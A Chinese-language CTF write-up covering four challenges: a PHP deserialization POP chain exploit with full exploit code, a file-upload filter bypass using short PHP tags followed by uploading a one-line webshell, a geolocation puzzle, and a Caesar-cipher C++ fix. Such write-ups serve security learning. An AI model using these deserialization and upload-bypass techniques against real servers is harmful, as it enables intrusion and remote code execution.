【web】phar —》私有属性赋值
当时遇到不知道privated该怎样赋值才可以,链子挺简单的,但是语法不熟悉
<?php
include 'funs.php';
highlight_file(__FILE__);
if (isset($_GET['file'])) {if (myWaf($_GET['file'])) {include($_GET['file']);} else {unserialize($_GET['data']);}
}
include(文件),这里很明显有文件包含漏洞
<?php
include 'f1@g.php';
function myWaf($data)
{if (preg_match("/f1@g/i", $data)) {echo "NONONONON0!";return FALSE;} else {return TRUE;}
}class A
{private $a;public function __destruct(){echo "A->" . $this->a . "destruct!";}
}class B
{private $b = array();public function __toString(){$str_array= $this->b;$str2 = $str_array['kfc']->vm50;return "Crazy Thursday".$str2;}
}
class C{private $c = array();public function __get($kfc){global $flag;$f = $this->c[$kfc];var_dump($$f);}
}
接下来就是构造链子,全是私有属性,使用
public function __construct()方法进行赋值
exp如下
<?phpclass A
{private $a;public function __construct(){$this->a=new B();}public function __destruct() //链子入口{echo "A->" . $this->a . "destruct!";}
}class B
{private $b = array('');public function __construct(){$this->b=array('kfc'=>new C());}public function __toString(){$str_array= $this->b;$str2 = $str_array['kfc']->vm50;return "Crazy Thursday".$str2;}
}
class C{private $c = array();public function __construct(){$this->c=array('vm50'=>'flag');}public function __get($kfc){global $flag;$f = $this->c[$kfc];var_dump($$f);}
}echo urlencode(serialize(new A()));
【web】uploader —》文件上传表单
<?php
$sandBox = md5($_SERVER['REMOTE_ADDR']);
if(!is_dir($sandBox)){mkdir($sandBox,0755,true);
}
if($_FILES){move_uploaded_file($_FILES['file']['tmp_name'],$sandBox."/".$_FILES["file"]["name"]);echo "上传文件名: " . $_FILES["file"]["name"] . "<br>";echo "文件类型: " . $_FILES["file"]["type"] . "<br>";echo "文件大小: " . ($_FILES["file"]["size"] / 1024) . " kB<br>";echo $sandBox;
}highlight_file(__FILE__);
这里没有文件上传的交互界面,得自己写个html表单来上传文件
用gpt进行生成,或者网上找到一个
<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>文件上传表单</title>
</head>
<body>
<h2>上传文件</h2>
<form action="http://4670ddc5-bf03-46ea-8c8b-460ae906c629.www.polarctf.com:8090/" method="post" enctype="multipart/form-data"><label for="file">选择文件:</label><input type="file" name="file" id="file"><br><br><input type="submit" name="submit" value="上传">
</form>
</body>
</html>如下图,上传文件成功的回显信息
如果直接上传php文件
会爆出502的错误
尝试抓包修改文件后缀
过滤了 <?php中的php
使用段标签
<?=phpinfo();?>
拼接好路径,尝试访问该文件
如下,成功访问
然后上传一句话
【misc】一小时十分钟后看海
当时对题目的理解有误,以为就是对所给图片的地方就是要找的地方,实际上是在这个地方,还有一小时十分钟的时间,才能去看海
结合当时的地点
可以看到有三个公交站的路线
高德地图上直接搜索
现在的思路就是要看,找一个海边的,而且时间差不多是一小时十分钟的
三个目标
有时候网上的和一些工具不一样生成的md5
【misc】加点儿什么
通过binwalk的分析得到两个文件
得到一个cpp文件
这里考察一点c++的基础,不是很懂也没关系
输入1的时候,是有正常回显的,但是输入2的时候没有正常回显
可以加密和解密的过程应该是差不多的,所以这里的思路就是对照着,这两个的区别在哪里就可以,找到可以输出的点
//加密
void Encryption()
{cout<<"请输入明文:"<<endl;gets(plaintext);cout<<"密文为:"<<endl;for(int i=0; plaintext[i] != '\0'; i++){if(plaintext[i] >= 'A' && plaintext[i] <= 'Z'){ciphertext[i] = (plaintext[i] - 'A' + K) % 26 + 'A';}else if (plaintext[i] >= 'a' && plaintext[i] <= 'z'){ciphertext[i]=(plaintext[i] - 'a' + K) % 26 + 'a';}elseciphertext[i] = plaintext[i];cout<<plaintext[i];}printf("\n");
}
解密
void Decryption()
{cout<<"请输入密文:"<<endl;gets(ciphertext);cout<<"明文为:"<<endl;for(int i=0; ciphertext[i] != '\0'; i++){if(ciphertext[i] >= 'A' && ciphertext[i] <= 'Z'){plaintext[i] = ((ciphertext[i] - 'A' - K) % 26 + 26)%26 + 'A';}else if (ciphertext[i] >= 'a' && ciphertext[i] <= 'z'){plaintext[i]=((ciphertext[i] - 'a' - K) % 26 + 26)%26 + 'a';}elseplaintext[i] = ciphertext[i];}printf("\n");
}
这两个对比很明显就解密少了个输出
cout<<plaintext[i];
加上即可(虽然和原来是一样的,哈哈)
)
)
)
)
)
